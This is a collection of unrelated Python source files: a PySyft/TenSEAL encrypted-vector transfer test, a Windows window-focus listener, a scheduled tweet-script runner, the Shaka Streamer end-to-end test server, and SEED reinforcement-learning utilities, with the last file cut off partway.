from ...grid.duet.signaling_server_test import run
ts = pytest.importorskip("tenseal")
sy.load("tenseal")
set_start_method("spawn", force=True)
PORT = 21000
def chunks(lst: List[Any], n: int) -> Generator[Any, Any, Any]:
"""Yield successive n-sized chunks from lst.
Args:
lst: list of items to chunk
n: number of items to include in each chunk
Yields:
single chunk of n items
"""
for i in range(0, len(lst), n):
yield lst[i : i + n] # noqa: E203
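# Quick illustrative self-check of chunks() (values are arbitrary):
# a length-5 list chunked by 2 yields two pairs and a trailing singleton.
assert list(chunks(list(range(5)), 2)) == [[0, 1], [2, 3], [4]]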
def do(ct_size: int, batch_size: int) -> None:
# third party
import numpy as np
import tenseal as ts
# syft absolute
import syft as sy
sy.load("tenseal")
sy.logger.add(sys.stderr, "ERROR")
duet = sy.launch_duet(loopback=True, network_url=f"http://127.0.0.1:{PORT}/")
duet.requests.add_handler(action="accept")
context = ts.context(
ts.SCHEME_TYPE.CKKS, 8192, coeff_mod_bit_sizes=[60, 40, 40, 60], n_threads=1
)
context.global_scale = pow(2, 40)
data = np.random.uniform(-10, 10, 100)
enc = []
for i in range(ct_size):
enc.append(ts.ckks_vector(context, data))
start = time.time()
_ = context.send(duet, pointable=True)
for chunk in chunks(enc, batch_size):
_ = sy.lib.python.List(chunk).send(duet, pointable=True)
sys.stderr.write(
f"[{ct_size}][{batch_size}] DO sending took {time.time() - start} sec\n"
)
sy.core.common.event_loop.loop.run_forever()
def ds(ct_size: int, batch_size: int) -> None:
# syft absolute
import syft as sy
sy.load("tenseal")
sy.logger.add(sys.stderr, "ERROR")
duet = sy.join_duet(loopback=True, network_url=f"http://127.0.0.1:{PORT}/")
time.sleep(10)
cnt = int(ct_size / batch_size)
start = time.time()
ctx = duet.store[0].get(request_block=True, delete_obj=False)
for idx in range(1, cnt + 1):
data = duet.store[idx].get(request_block=True, delete_obj=False)
for tensor in data:
tensor.link_context(ctx)
assert len(data) == batch_size, len(data)
sys.stderr.write(
f"[{ct_size}][{batch_size}] DS get took {time.time() - start} sec\n"
)
@pytest.fixture(scope="module")
def signaling_server() -> Process:
print(f"creating signaling server on port {PORT}")
grid_proc = Process(target=run, args=(PORT,))
grid_proc.start()
def grid_cleanup() -> None:
print("stop signaling server")
grid_proc.terminate()
grid_proc.join()
atexit.register(grid_cleanup)
return grid_proc
@pytest.mark.vendor(lib="tenseal")
def test_tenseal_duet_ciphertext_size(signaling_server: Process) -> None:
time.sleep(3)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
assert s.connect_ex(("localhost", PORT)) == 0
for ct_size in [10, 20]:
for batch_size in [1, 10, ct_size]:
start = time.time()
do_proc = SyftTestProcess(target=do, args=(ct_size, batch_size))
do_proc.start()
ds_proc = SyftTestProcess(target=ds, args=(ct_size, batch_size))
ds_proc.start()
ds_proc.join(120)
do_proc.terminate()
if do_proc.exception:
exception, tb = do_proc.exception
raise Exception(tb) from exception
if ds_proc.exception:
exception, tb = ds_proc.exception
raise Exception(tb) from exception
if ds_proc.is_alive():
ds_proc.terminate()
raise Exception(f"ds_proc is hung for {ct_size}")
print(
f"test {ct_size} batch_size {batch_size} passed in {time.time() - start} seconds"
)
|
window change listener.py | """
Script using the Windows API to register for window focus changes and print the
titles of newly focused windows.
"""
import sys
import time
import ctypes
import ctypes.wintypes
import threading
import six
class ObservableWindowChange(object):
def __init__(self):
self.__observers = []
def register_observer(self, observer):
self.__observers.append(observer)
def notify_observers(self, *args, **kwargs):
win_title = ''.join(args)
if win_title == '':
return ''
for observer in self.__observers:
observer.notify(win_title)
def start_event_listener(self):
# Create a WindowChangeEventListener object with this instance of
# ObservableWindowChange as a parameter (self)
listener = WindowChangeEventListener(self)
listener.listen_forever()
class IWindowChangeObserver(object):
"""
Base class for observing window changes
"""
def __init__(self, observable):
observable.register_observer(self)
def notify(self, win_title):
raise NotImplementedError
class WindowChangeEventListener(object):
"""
WindowChangeEventListener
"""
def __init__(self, observable):
self.observable = observable
def listen_forever(self):
# This is to fix a problem with ascii encoding (windows with Unicode in
# their titles)
if six.PY2:
reload(sys)
sys.setdefaultencoding('utf8')
# Look here for DWORD event constants:
# http://stackoverflow.com/questions/15927262/convert-dword-event-constant-from-wineventproc-to-name-in-c-sharp
# Don't worry, they work for python too.
EVENT_SYSTEM_DIALOGSTART = 0x0010
WINEVENT_OUTOFCONTEXT = 0x0000
EVENT_SYSTEM_FOREGROUND = 0x0003
WINEVENT_SKIPOWNPROCESS = 0x0002
user32 = ctypes.windll.user32
ole32 = ctypes.windll.ole32
EnumWindows = ctypes.windll.user32.EnumWindows
EnumWindowsProc = ctypes.WINFUNCTYPE(ctypes.c_bool,
ctypes.POINTER(ctypes.c_int),
ctypes.POINTER(ctypes.c_int))
GetWindowText = ctypes.windll.user32.GetWindowTextW
GetWindowTextLength = ctypes.windll.user32.GetWindowTextLengthW
IsWindowVisible = ctypes.windll.user32.IsWindowVisible
ole32.CoInitialize(0)
WinEventProcType = ctypes.WINFUNCTYPE(
None,
ctypes.wintypes.HANDLE,
ctypes.wintypes.DWORD,
ctypes.wintypes.HWND,
ctypes.wintypes.LONG,
ctypes.wintypes.LONG,
ctypes.wintypes.DWORD,
ctypes.wintypes.DWORD
)
def callback(hWinEventHook, event, hwnd, idObject, idChild, dwEventThread,
dwmsEventTime):
length = GetWindowTextLength(hwnd)
buff = ctypes.create_unicode_buffer(length + 1)
GetWindowText(hwnd, buff, length + 1)
# Notify observers
self.observable.notify_observers(buff.value)
WinEventProc = WinEventProcType(callback)
user32.SetWinEventHook.restype = ctypes.wintypes.HANDLE
hook = user32.SetWinEventHook(
EVENT_SYSTEM_FOREGROUND,
EVENT_SYSTEM_FOREGROUND,
0,
WinEventProc,
0,
0,
WINEVENT_OUTOFCONTEXT | WINEVENT_SKIPOWNPROCESS
)
if hook == 0:
print('SetWinEventHook failed')
sys.exit(1)
msg = ctypes.wintypes.MSG()
while user32.GetMessageW(ctypes.byref(msg), 0, 0, 0) != 0:
user32.TranslateMessageW(msg)
user32.DispatchMessageW(msg)
# Stopped receiving events, so clear up the winevent hook and uninitialise.
print('Stopped receiving new window change events. Exiting...')
user32.UnhookWinEvent(hook)
ole32.CoUninitialize()
class WindowObserver(IWindowChangeObserver):
def notify(self, win_title):
print("Window '%s' focused" % win_title)
if __name__ == '__main__':
def run():
# Create an observable and an observer observing it
subject = ObservableWindowChange()
observer = WindowObserver(subject)
# Listen for window changes
subject.start_event_listener()
# Start the 'run' method in a daemonized thread.
t = threading.Thread(target=run)
t.daemon = True
t.start()
# Keep the main thread running in a sleep loop until ctrl+c (SIGINT) is caught.
# Once the main thread terminates, all daemon threads will automatically
# terminate.
while True:
try:
time.sleep(0.1)
except KeyboardInterrupt:
break
|
tweet.py | import time
import threading
import subprocess
# Set the execution interval
def wait():
time.sleep(600)
# Set the files to execute
def cmd_exe(): # Call Python files
subprocess.call("python osaka_tweet.py")
print("Osaka tweet")
print("------------------------------------------------------")
subprocess.call("python hyogo_tweet.py")
print("Hyogo tweet")
print("------------------------------------------------------")
subprocess.call("python tokyo_tweet.py")
print("Tokyo tweet")
print("------------------------------------------------------")
subprocess.call("python hokkaido_tweet.py")
print("Hokkaido tweet")
print("------------------------------------------------------")
subprocess.call("python fukuoka_tweet.py")
print("Fukuoka tweet")
print("------------------------------------------------------")
subprocess.call("python aichi_tweet.py")
print("Aichi tweet")
print("------------------------------------------------------")
subprocess.call("python japan_tweet.py")
print("Nationwide tweet")
print("------------------------------------------------------")
method_list = [wait, cmd_exe]
# Run the 10-minute timer and the tweet batch in parallel, then wait for
# both to finish before starting the next cycle.
for i in range(1, 4320):
    threads = []
    for method in method_list:
        t = threading.Thread(target=method)
        t.start()
        threads.append(t)
    for t in threads:
        t.join() |
run_end_to_end_tests.py | #!/usr/bin/env python3
#
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import flask
import glob
import json
import logging
import os
import re
import shutil
import subprocess
import sys
import time
import threading
import traceback
import urllib
from mypy import api as mypy_api
from streamer import node_base
from streamer.controller_node import ControllerNode
from streamer.configuration import ConfigError
OUTPUT_DIR = 'output_files/'
TEST_DIR = 'test_assets/'
CLOUD_TEST_ASSETS = (
'https://storage.googleapis.com/shaka-streamer-assets/test-assets/')
# Turn down Flask's logging so that the console isn't flooded with messages
# about every request. Because flask is built on top of another tool called
# "werkzeug", this is the name we use to retrieve the log instance.
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
# Change the working directory to where this file lives.
os.chdir(os.path.dirname(os.path.abspath(__file__)))
controller = None
app = flask.Flask(__name__)
# Stops browser from caching files to prevent cross-test contamination.
app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 0
def cleanup():
# If the controller is running, stop it.
global controller
if controller is not None:
controller.stop()
controller = None
# If the output directory exists, delete it and make a new one.
if os.path.exists(OUTPUT_DIR):
shutil.rmtree(OUTPUT_DIR)
os.mkdir(OUTPUT_DIR)
def createCrossOriginResponse(body=None, status=200, mimetype='text/plain'):
# Enable CORS because karma and flask are cross-origin.
resp = flask.Response(response=body, status=status)
resp.headers.add('Content-Type', mimetype)
resp.headers.add('Access-Control-Allow-Origin', '*')
resp.headers.add('Access-Control-Allow-Methods', 'GET,POST')
return resp
def dashStreamsReady(manifest_path):
"""Wait for DASH streams to be ready.
Return True if the DASH manifest exists and each Representation has at least
one segment in it.
"""
# Check to see if the DASH manifest exists yet.
if not os.path.exists(manifest_path):
return False
# Waiting until every Representation has a segment.
pattern = re.compile(r'<Representation.*?((\n).*?)*?Representation>')
with open(manifest_path) as manifest_file:
for representation in pattern.finditer(manifest_file.read()):
if not re.search(r'<S t', representation.group()):
# This Representation has no segments.
return False
return True
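# Illustrative fragment (assumed manifest shape, not from a real asset):
# a Representation counts as ready once its SegmentTimeline holds at least
# one <S t="..."> entry:
#
#   <Representation id="1" bandwidth="500000">
#     <SegmentTemplate timescale="90000">
#       <SegmentTimeline><S t="0" d="90000"/></SegmentTimeline>
#     </SegmentTemplate>
#   </Representation>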
def hlsStreamsReady(master_playlist_path):
"""Wait for HLS streams to be ready.
Return True if the HLS master playlist exists, and all of the media playlists
referenced by it exist, and each of those media playlists have at least one
segment in it.
"""
# Check to see if the HLS master playlist exists yet.
if not os.path.exists(master_playlist_path):
return False
# Parsing master playlist to see how many media playlists there are.
# Do this every time, since the master playlist contents may change.
with open(master_playlist_path) as hls_file:
contents = hls_file.read()
media_playlist_list = re.findall(r'^.*\.m3u8$', contents, re.MULTILINE)
media_playlist_count = len(media_playlist_list)
# See how many playlists exist so far.
playlist_list = glob.glob(OUTPUT_DIR + '*.m3u8')
# Return False if we don't have the right number. The +1 accounts for the
# master playlist.
if len(playlist_list) != media_playlist_count + 1:
return False
for playlist_path in playlist_list:
if playlist_path == master_playlist_path:
# Skip the master playlist
continue
with open(playlist_path) as playlist_file:
if '#EXTINF' not in playlist_file.read():
# This doesn't have segments yet.
return False
return True
@app.route('/start', methods = ['POST'])
def start():
global controller
if controller is not None:
return createCrossOriginResponse(
status=403, body='Instance already running!')
cleanup()
# Receives configs from the tests to start Shaka Streamer.
try:
configs = json.loads(flask.request.data)
except Exception as e:
return createCrossOriginResponse(status=400, body=str(e))
# Enforce quiet mode without needing it specified in every test.
configs['pipeline_config']['quiet'] = True
controller = ControllerNode()
try:
controller.start(OUTPUT_DIR,
configs['input_config'],
configs['pipeline_config'],
configs['bitrate_config'],
check_deps=False)
except Exception as e:
# If the controller throws an exception during startup, we want to call
# stop() to shut down any external processes that have already been started.
controller.stop()
controller = None
# Then, fail the request with a message that indicates what the error was.
if isinstance(e, ConfigError):
body = json.dumps({
'error_type': type(e).__name__,
'class_name': e.class_name,
'field_name': e.field_name,
'field_type': e.field.get_type_name(),
'message': str(e),
})
return createCrossOriginResponse(
status=418, mimetype='application/json', body=body)
else:
traceback.print_exc()
return createCrossOriginResponse(status=500, body=str(e))
return createCrossOriginResponse()
@app.route('/stop')
def stop():
global controller
resp = createCrossOriginResponse()
if controller is not None:
# Check status to see if one of the processes exited.
if controller.check_status() == node_base.ProcessStatus.Errored:
resp = createCrossOriginResponse(
status=500, body='Some processes exited with non-zero exit codes')
cleanup()
return resp
@app.route('/output_files/<path:filename>', methods = ['GET', 'OPTIONS'])
def send_file(filename):
if not controller:
return createCrossOriginResponse(
status=403, body='Instance already shut down!')
elif controller.is_vod():
# If streaming mode is vod, needs to wait until packager is completely
# done packaging contents.
while True:
status = controller.check_status()
if status == node_base.ProcessStatus.Finished:
break
elif status != node_base.ProcessStatus.Running:
return createCrossOriginResponse(
status=500, body='Some processes exited with non-zero exit codes')
time.sleep(1)
else:
# If streaming mode is live, needs to wait for specific content in
# manifest until it can be loaded by the player.
if filename.endswith('.mpd'):
while not dashStreamsReady(OUTPUT_DIR + filename):
time.sleep(1)
elif filename.endswith('.m3u8') and not filename.startswith('stream_'):
while not hlsStreamsReady(OUTPUT_DIR + filename):
time.sleep(1)
# Sending over requested files.
try:
response = flask.send_file(OUTPUT_DIR + filename)
except FileNotFoundError:
response = flask.Response(response='File not found', status=404)
response.headers.add('Access-Control-Allow-Origin', '*')
response.headers.add('Access-Control-Allow-Headers', 'RANGE')
return response
def fetch_cloud_assets():
file_list = [
'BigBuckBunny.1080p.mp4',
'Sintel.2010.720p.Small.mkv',
'Sintel.2010.Arabic.vtt',
'Sintel.2010.Chinese.vtt',
'Sintel.2010.English.vtt',
'Sintel.2010.Esperanto.vtt',
'Sintel.2010.French.vtt',
'Sintel.2010.Spanish.vtt',
'Sintel.with.subs.mkv',
]
# Download all the assets needed for the tests.
for file in file_list:
if not os.path.exists(TEST_DIR + file):
response = urllib.request.urlretrieve(CLOUD_TEST_ASSETS +
file,
TEST_DIR + file)
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--runs', default=1, type=int,
help='Number of trials to run')
parser.add_argument('--reporters', nargs='+',
help='Enables specified reporters in karma')
args = parser.parse_args()
# Do static type checking on the project first.
type_check_result = mypy_api.run(['streamer/'])
if type_check_result[2] != 0:
print('The type checker found the following errors: ')
print(type_check_result[0])
return 1
# Install test dependencies.
subprocess.check_call(['npm', 'install'])
# Fetch streams used in tests.
if not os.path.exists(TEST_DIR):
os.mkdir(TEST_DIR)
fetch_cloud_assets()
# Start up flask server on a thread.
# Daemon is set to True so that this thread automatically gets
# killed when exiting main. Flask does not offer a clean
# way to shut itself down otherwise.
threading.Thread(target=app.run, daemon=True).start()
fails = 0
trials = args.runs
print('Running', trials, 'trials')
for i in range(trials):
# Start up karma.
karma_args = [
'node_modules/karma/bin/karma',
'start',
'tests/karma.conf.js',
# DRM currently is not compatible with headless, so it's run in Chrome.
# Linux: If you want to run tests as "headless", wrap it with "xvfb-run -a".
'--browsers', 'Chrome',
'--single-run',
]
if args.reporters:
converted_string = ','.join(args.reporters)
karma_args += [
'--reporters',
converted_string,
]
# If the exit code was not 0, the tests in karma failed or crashed.
if subprocess.call(karma_args) != 0:
fails += 1
print('\n\nNumber of failures:', fails, '\nNumber of trials:', trials)
print('\nSuccess rate:', 100 * (trials - fails) / trials, '%')
cleanup()
return fails
if __name__ == '__main__':
# Exit code based on test results from subprocess call.
sys.exit(main())
|
utils.py | # coding=utf-8
# Copyright 2019 The SEED Authors
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utility functions/classes."""
import collections
import contextlib
import threading
import timeit
from absl import logging
import numpy as np
import tensorflow as tf
from tensorflow.python.distribute import values as values_lib
from tensorflow.python.framework import composite_tensor
from tensorflow.python.framework import tensor_conversion_registry
# `observation` is the observation *after* a transition. When `done` is True,
# `observation` will be the observation *after* the reset.
EnvOutput = collections.namedtuple('EnvOutput', 'reward done observation')
Settings = collections.namedtuple(
'Settings', 'strategy inference_devices training_strategy encode decode')
def init_learner(num_training_tpus):
"""Performs common learner initialization."""
if tf.config.experimental.list_logical_devices('TPU'):
resolver = tf.distribute.cluster_resolver.TPUClusterResolver('')
topology = tf.tpu.experimental.initialize_tpu_system(resolver)
strategy = tf.distribute.experimental.TPUStrategy(resolver)
training_da = tf.tpu.experimental.DeviceAssignment.build(
topology, num_replicas=num_training_tpus)
training_strategy = tf.distribute.experimental.TPUStrategy(
resolver, device_assignment=training_da)
inference_devices = list(set(strategy.extended.worker_devices) -
set(training_strategy.extended.worker_devices))
return Settings(strategy, inference_devices, training_strategy, tpu_encode,
tpu_decode)
else:
tf.device('/cpu').__enter__()
any_gpu = tf.config.experimental.list_logical_devices('GPU')
device_name = '/device:GPU:0' if any_gpu else '/device:CPU:0'
strategy = tf.distribute.OneDeviceStrategy(device=device_name)
enc = lambda x: x
dec = lambda x, s=None: x if s is None else tf.nest.pack_sequence_as(s, x)
return Settings(strategy, [device_name], strategy, enc, dec)
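# Hedged usage sketch (hypothetical): on a host without TPUs,
# init_learner() falls back to a OneDeviceStrategy and identity
# encode/decode functions.
def _example_init_learner():
    settings = init_learner(num_training_tpus=2)
    with settings.strategy.scope():
        step = tf.Variable(0, dtype=tf.int64)  # replicated per strategy
    return settings.decode(settings.encode(step))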
class UnrollStore(tf.Module):
"""Utility module for combining individual actor steps into unrolls."""
def __init__(self,
num_actors,
unroll_length,
timestep_specs,
num_overlapping_steps=0,
name='UnrollStore'):
super(UnrollStore, self).__init__(name=name)
with self.name_scope:
self._full_length = num_overlapping_steps + unroll_length + 1
def create_unroll_variable(spec):
z = tf.zeros(
[num_actors, self._full_length] + spec.shape.dims, dtype=spec.dtype)
return tf.Variable(z, trainable=False, name=spec.name)
self._unroll_length = unroll_length
self._num_overlapping_steps = num_overlapping_steps
self._state = tf.nest.map_structure(create_unroll_variable,
timestep_specs)
# For each actor, the index into the actor dimension of the tensors in
# self._state where we should add the next element.
self._index = tf.Variable(
tf.fill([num_actors], tf.constant(num_overlapping_steps, tf.int32)),
trainable=False,
name='index')
@property
def unroll_specs(self):
return tf.nest.map_structure(lambda v: tf.TensorSpec(v.shape[1:], v.dtype),
self._state)
@tf.function
@tf.Module.with_name_scope
def append(self, actor_ids, values):
"""Appends values and returns completed unrolls.
Args:
actor_ids: 1D tensor with the list of actor IDs for which we append data.
There must not be duplicates.
values: Values to add for each actor. This is a structure (in the tf.nest
sense) of tensors following "timestep_specs", with a batch front
dimension which must be equal to the length of 'actor_ids'.
Returns:
A pair of:
- 1D tensor of the actor IDs of the completed unrolls.
- Completed unrolls. This is a structure of tensors following
'timestep_specs', with added front dimensions: [num_completed_unrolls,
num_overlapping_steps + unroll_length + 1].
"""
tf.debugging.assert_equal(
tf.shape(actor_ids),
tf.shape(tf.unique(actor_ids)[0]),
message='Duplicate actor ids')
tf.nest.map_structure(
lambda s: tf.debugging.assert_equal(
tf.shape(actor_ids)[0],
tf.shape(s)[0],
message='Batch dimension must be same size as number of actors.'),
values)
curr_indices = self._index.sparse_read(actor_ids)
unroll_indices = tf.stack([actor_ids, curr_indices], axis=-1)
for s, v in zip(tf.nest.flatten(self._state), tf.nest.flatten(values)):
s.scatter_nd_update(unroll_indices, v)
# Intentionally not protecting against out-of-bounds to make it possible to
# detect completed unrolls.
self._index.scatter_add(tf.IndexedSlices(1, actor_ids))
return self._complete_unrolls(actor_ids)
@tf.function
@tf.Module.with_name_scope
def reset(self, actor_ids):
"""Resets state.
Note, this is only intended to be called when actors need to be reset after
preemptions. Not at episode boundaries.
Args:
actor_ids: The actors that need to have their state reset.
"""
self._index.scatter_update(
tf.IndexedSlices(self._num_overlapping_steps, actor_ids))
# The following code is the equivalent of:
# s[actor_ids, :j] = 0
j = self._num_overlapping_steps
repeated_actor_ids = tf.reshape(
tf.tile(tf.expand_dims(tf.cast(actor_ids, tf.int64), -1), [1, j]), [-1])
repeated_range = tf.tile(tf.range(j, dtype=tf.int64),
[tf.shape(actor_ids)[0]])
indices = tf.stack([repeated_actor_ids, repeated_range], axis=-1)
for s in tf.nest.flatten(self._state):
z = tf.zeros(tf.concat([tf.shape(repeated_actor_ids),
s.shape[2:]], axis=0), s.dtype)
s.scatter_nd_update(indices, z)
def _complete_unrolls(self, actor_ids):
# Actors with unrolls that are now complete and should be returned.
actor_indices = self._index.sparse_read(actor_ids)
actor_ids = tf.gather(
actor_ids,
tf.where(tf.equal(actor_indices, self._full_length))[:, 0])
actor_ids = tf.cast(actor_ids, tf.int64)
unrolls = tf.nest.map_structure(lambda s: s.sparse_read(actor_ids),
self._state)
# Store last transitions as the first in the next unroll.
# The following code is the equivalent of:
# s[actor_ids, :j] = s[actor_ids, -j:]
j = self._num_overlapping_steps + 1
repeated_start_range = tf.tile(tf.range(j, dtype=tf.int64),
[tf.shape(actor_ids)[0]])
repeated_end_range = tf.tile(
tf.range(self._full_length - j, self._full_length, dtype=tf.int64),
[tf.shape(actor_ids)[0]])
repeated_actor_ids = tf.reshape(
tf.tile(tf.expand_dims(actor_ids, -1), [1, j]), [-1])
start_indices = tf.stack([repeated_actor_ids, repeated_start_range], -1)
end_indices = tf.stack([repeated_actor_ids, repeated_end_range], -1)
for s in tf.nest.flatten(self._state):
s.scatter_nd_update(start_indices, s.gather_nd(end_indices))
self._index.scatter_update(
tf.IndexedSlices(1 + self._num_overlapping_steps, actor_ids))
return actor_ids, unrolls
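# Hedged usage sketch (hypothetical spec and shapes): two actors producing
# scalar rewards; append() hands back completed unrolls once an actor has
# buffered unroll_length + 1 timesteps.
def _example_unroll_store():
    store = UnrollStore(
        num_actors=2,
        unroll_length=3,
        timestep_specs=tf.TensorSpec([], tf.float32, 'reward'))
    for step in range(4):
        done_ids, unrolls = store.append(
            tf.constant([0, 1]), tf.constant([float(step), float(step)]))
    return done_ids, unrolls  # completed on the 4th append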
class PrioritizedReplay(tf.Module):
"""Prioritized Replay Buffer.
This buffer is not threadsafe. Make sure you call insert() and sample() from a
single thread.
"""
def __init__(self, size, specs, importance_sampling_exponent,
name='PrioritizedReplay'):
super(PrioritizedReplay, self).__init__(name=name)
self._priorities = tf.Variable(tf.zeros([size]), dtype=tf.float32)
self._buffer = tf.nest.map_structure(
lambda ts: tf.Variable(tf.zeros([size] + ts.shape, dtype=ts.dtype)),
specs)
self.num_inserted = tf.Variable(0, dtype=tf.int64)
self._importance_sampling_exponent = importance_sampling_exponent
@tf.function
@tf.Module.with_name_scope
def insert(self, values, priorities):
"""FIFO insertion/removal.
Args:
values: The batched values to insert. The tensors must be of the same
shape and dtype as the `specs` provided in the constructor, except
including a batch dimension.
priorities: <float32>[batch_size] tensor with the priorities of the
elements we insert.
Returns:
The indices of the inserted values.
"""
tf.nest.assert_same_structure(values, self._buffer)
values = tf.nest.map_structure(tf.convert_to_tensor, values)
append_size = tf.nest.flatten(values)[0].shape[0]
start_index = self.num_inserted
end_index = start_index + append_size
# Wrap around insertion.
size = self._priorities.shape[0]
insert_indices = tf.range(start_index, end_index) % size
tf.nest.map_structure(
lambda b, v: b.batch_scatter_update(
tf.IndexedSlices(v, insert_indices)),
self._buffer,
values)
self.num_inserted.assign_add(append_size)
self._priorities.batch_scatter_update(
tf.IndexedSlices(priorities, insert_indices))
return insert_indices
@tf.function
@tf.Module.with_name_scope
def sample(self, num_samples, priority_exp):
r"""Samples items from the replay buffer, using priorities.
Args:
num_samples: int, number of replay items to sample.
priority_exp: Priority exponent. Every item i in the replay buffer will be
sampled with probability:
priority[i] ** priority_exp /
sum(priority[j] ** priority_exp, j \in [0, num_items))
Set this to 0 in order to get uniform sampling.
Returns:
Tuple of:
- indices: An int64 tensor of shape [num_samples] with the indices in
the replay buffer of the sampled items.
- weights: A float32 tensor of shape [num_samples] with the normalized
weights of the sampled items.
- sampled_values: A nested structure following the spec passed in the
constructor, where each tensor has an added front batch dimension equal
to 'num_samples'.
"""
tf.debugging.assert_greater_equal(
self.num_inserted,
tf.constant(0, tf.int64),
message='Cannot sample if replay buffer is empty')
size = self._priorities.shape[0]
limit = tf.minimum(tf.cast(size, tf.int64), self.num_inserted)
if priority_exp == 0:
indices = tf.random.uniform([num_samples], maxval=limit, dtype=tf.int64)
weights = tf.ones_like(indices, dtype=tf.float32)
else:
prob = self._priorities[:limit]**priority_exp
prob /= tf.reduce_sum(prob)
indices = tf.random.categorical([tf.math.log(prob)], num_samples)[0]
# Importance weights.
weights = (((1. / tf.cast(limit, tf.float32)) /
tf.gather(prob, indices)) **
self._importance_sampling_exponent)
weights /= tf.reduce_max(weights) # Normalize.
sampled_values = tf.nest.map_structure(
lambda b: b.sparse_read(indices), self._buffer)
return indices, weights, sampled_values
@tf.function
@tf.Module.with_name_scope
def update_priorities(self, indices, priorities):
"""Updates the priorities of the items with the given indices.
Args:
indices: <int64>[batch_size] tensor with the indices of the items to
update. If duplicate indices are provided, the priority that will be set
among possible ones is not specified.
priorities: <float32>[batch_size] tensor with the new priorities.
"""
self._priorities.batch_scatter_update(tf.IndexedSlices(priorities, indices))
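# Hedged usage sketch (hypothetical sizes): FIFO insertion followed by a
# prioritized sample and a priority update.
def _example_prioritized_replay():
    replay = PrioritizedReplay(
        size=8,
        specs=tf.TensorSpec([2], tf.float32, 'obs'),
        importance_sampling_exponent=0.6)
    replay.insert(tf.ones([4, 2]), priorities=tf.fill([4], 1.0))
    indices, weights, values = replay.sample(num_samples=2, priority_exp=0.9)
    replay.update_priorities(indices, tf.fill([2], 0.5))
    return indices, weights, values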
class Aggregator(tf.Module):
"""Utility module for keeping state and statistics for individual actors."""
def __init__(self, num_actors, specs, name='Aggregator'):
"""Inits an Aggregator.
Args:
num_actors: int, number of actors.
specs: Structure (as defined by tf.nest) of tf.TensorSpecs that will be
stored for each actor.
name: Name of the scope for the operations.
"""
super(Aggregator, self).__init__(name=name)
def create_variable(spec):
z = tf.zeros([num_actors] + spec.shape.dims, dtype=spec.dtype)
return tf.Variable(z, trainable=False, name=spec.name)
self._state = tf.nest.map_structure(create_variable, specs)
@tf.Module.with_name_scope
def reset(self, actor_ids):
"""Fills the tensors for the given actors with zeros."""
with tf.name_scope('Aggregator_reset'):
for s in tf.nest.flatten(self._state):
s.scatter_update(tf.IndexedSlices(0, actor_ids))
@tf.Module.with_name_scope
def add(self, actor_ids, values):
"""In-place adds values to the state associated to the given actors.
Args:
actor_ids: 1D tensor with the list of actor IDs we want to add values to.
values: A structure of tensors following the input spec, with an added
first dimension that must either have the same size as 'actor_ids', or
should not exist (in which case, the value is broadcasted to all actor
ids).
"""
tf.nest.assert_same_structure(values, self._state)
for s, v in zip(tf.nest.flatten(self._state), tf.nest.flatten(values)):
s.scatter_add(tf.IndexedSlices(v, actor_ids))
@tf.Module.with_name_scope
def read(self, actor_ids):
"""Reads the values corresponding to a list of actors.
Args:
actor_ids: 1D tensor with the list of actor IDs we want to read.
Returns:
A structure of tensors with the same shapes as the input specs. A
dimension is added in front of each tensor, with size equal to the number
of actor_ids provided.
"""
return tf.nest.map_structure(lambda s: s.sparse_read(actor_ids),
self._state)
@tf.Module.with_name_scope
def replace(self, actor_ids, values):
"""Replaces the state associated to the given actors.
Args:
actor_ids: 1D tensor with the list of actor IDs.
values: A structure of tensors following the input spec, with an added
first dimension that must either have the same size as 'actor_ids', or
should not exist (in which case, the value is broadcasted to all actor
ids).
"""
tf.nest.assert_same_structure(values, self._state)
for s, v in zip(tf.nest.flatten(self._state), tf.nest.flatten(values)):
s.scatter_update(tf.IndexedSlices(v, actor_ids))
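# Hedged usage sketch (hypothetical): per-actor return accumulation with
# four actors and a scalar spec.
def _example_aggregator():
    returns = Aggregator(num_actors=4,
                         specs=tf.TensorSpec([], tf.float32, 'return'))
    returns.add(tf.constant([0, 2]), tf.constant([1.0, 0.5]))
    returns.reset(tf.constant([2]))           # zero out actor 2
    return returns.read(tf.constant([0, 2]))  # -> [1.0, 0.0]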
class ProgressLogger(object):
"""Helper class for performing periodic logging of the training progress."""
def __init__(self,
summary_writer=None,
initial_period=0.01,
period_factor=1.01,
max_period=10.0):
"""Constructs ProgressLogger.
Args:
summary_writer: Tensorflow summary writer to use.
initial_period: Initial logging period in seconds
(how often logging happens).
period_factor: Factor by which logging period is
multiplied after each iteration (exponential back-off).
max_period: Maximal logging period in seconds
(the end of exponential back-off).
"""
self.summary_writer = summary_writer
self.period = initial_period
self.period_factor = period_factor
self.max_period = max_period
# Array of strings with names of values to be logged.
self.log_keys = []
self.step_cnt = tf.Variable(-1, dtype=tf.int64)
self.ready_values = tf.Variable([-1.0],
dtype=tf.float32,
shape=tf.TensorShape(None))
self.logger_thread = None
self.logging_callback = None
self.terminator = None
self.last_log_time = timeit.default_timer()
self.last_log_step = 0
def start(self, logging_callback=None):
assert self.logger_thread is None
self.logging_callback = logging_callback
self.terminator = threading.Event()
self.logger_thread = threading.Thread(target=self._logging_loop)
self.logger_thread.start()
def shutdown(self):
assert self.logger_thread
self.terminator.set()
self.logger_thread.join()
self.logger_thread = None
def log_session(self):
return []
def log(self, session, name, value):
# this is a python op so it happens only when this tf.function is compiled
self.log_keys.append(name)
# this is a TF op.
session.append(value)
def step_end(self, session, strategy=None, step_increment=1):
logs = []
for value in session:
if strategy:
value = tf.reduce_mean(tf.cast(
strategy.experimental_local_results(value)[0], tf.float32))
logs.append(value)
self.ready_values.assign(logs)
self.step_cnt.assign_add(step_increment)
def _log(self):
